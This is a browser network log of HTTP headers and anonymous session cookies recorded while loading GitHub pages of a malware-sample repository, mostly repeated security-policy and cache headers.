cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"51780315779576e847c2772c017621a9"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 449
x-github-request-id: F456:3129D7:19AD563:1C59737:66426E86
-
Remote address:20.26.156.215:443RequestGET /opensearch.xml HTTP/2.0
host: github.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"b58643dfe8783c0009cfe2744b347e4d"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 1063
x-github-request-id: F456:3129D7:19AD563:1C59738:66426E86
-
Remote address:20.26.156.215:443RequestGET /manifest.json HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: manifest
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:22 GMT
content-type: text/xml
last-modified: Mon, 13 May 2024 18:23:03 GMT
etag: W/"66425a87-225"
vary: Accept-Encoding, Accept, X-Requested-With
x-frame-options: DENY
content-encoding: gzip
set-cookie: _gh_sess=hyrR4aiuOYu9QRNNo%2F859tlQbaEXuf2NmC3oshPgWsZaQGMy%2BO7owtOi3sxmWCA%2FP3Xrt%2FLq6EaGd%2Fp%2B4W4Z%2F0J7C7%2F5kcwf5cdGFQcnloBvHLkPz3Ii0KmEsb8h92PTJpKieGwkVoHk2erulgLMZBXDM8rOA%2Fo8cbPeufc0iub7bz5KzKrKYaGBjsr4RoGdFKzlS8bNIpcHhxrsELchXrIBdw47bokdu8VVU82xaD%2Bp%2Fg02OX%2FDZGVAxQ1UsMMJQ5cIpM0k%2FPo1TuPjyn5N9w%3D%3D--4r2qdntAEU5uxYO0--i372NgaLz6%2FMFyzu%2Fjf6Qg%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax
set-cookie: _octo=GH1.1.567213750.1715629702; Path=/; Domain=github.com; Expires=Tue, 13 May 2025 19:48:22 GMT; Secure; SameSite=Lax
set-cookie: logged_in=no; Path=/; Domain=github.com; Expires=Tue, 13 May 2025 19:48:22 GMT; HttpOnly; Secure; SameSite=Lax
accept-ranges: bytes
content-length: 328
x-github-request-id: F456:3129D7:19AD572:1C59746:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree/master/enderware HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: text/html, application/xhtml+xml
dnt: 1
turbo-visit: true
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:28 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"c7acb164ff7c7fc40abb51bd32dd74ae"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
x-html-safe: 9ff54e1eaefcf1dab87afdeb170810c74ba72981fa51e817eb112ba22a3d04bb
accept-ranges: bytes
x-github-request-id: F456:3129D7:19AD8AA:1C59AD9:66426E86
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/latest-commit/master/enderware HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:29 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e61453a6d8b82727dfe87839b3fc469c"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 177
x-github-request-id: F456:3129D7:19AD902:1C59B30:66426E8D
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree-commit-info/master/enderware HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:29 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"746e56e08152d51f24c3e70b66697230"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 443
x-github-request-id: F456:3129D7:19AD902:1C59B2F:66426E8D
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/deferred-metadata/master/enderware HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: application/json
accept: application/json
x-requested-with: XMLHttpRequest
github-verified-fetch: true
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/enderware
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=yBoYB7qz7%2FTxiWTKMKGdELPcpeXf5icp%2Bxv8Hbus%2FOL9CroBcGsgJuOIeOCIwwOD8msur6KLdpVVUwEypvRLyliws8eI147xTEyn21Bj9VFUSYQKXNgVYKonyVqFIS0F8htt3miOmUSr%2BS%2B31cfUqhpNGL9fKPDQu0FwdFVycMVOA%2BS62KFOOXCl5ttJgIr%2FFm2Iw8%2Fx3dk4vkUWNbffzEuzPTAHQ%2B75OzvgXzgLKGI9Qu3oETLomlK4z7cr8qQ9xhpkWNpJdaaqgBnzchXrEA%3D%3D--ZLTceBrjdVc6vTVm--nWqQ%2FYQ186sc1ms2KcD46w%3D%3D
cookie: _octo=GH1.1.1831426451.1715629700
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 200
date: Mon, 13 May 2024 19:48:29 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"5c52b3ba1a3981aa4697906216c5acc4"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/copilot-codex/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
content-length: 443
x-github-request-id: F456:3129D7:19AD902:1C59B2E:66426E8C
-
Remote address:20.26.156.215:443RequestGET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
host: github.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json
dnt: 1
x-requested-with: XMLHttpRequest
x-github-target: dotcom
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
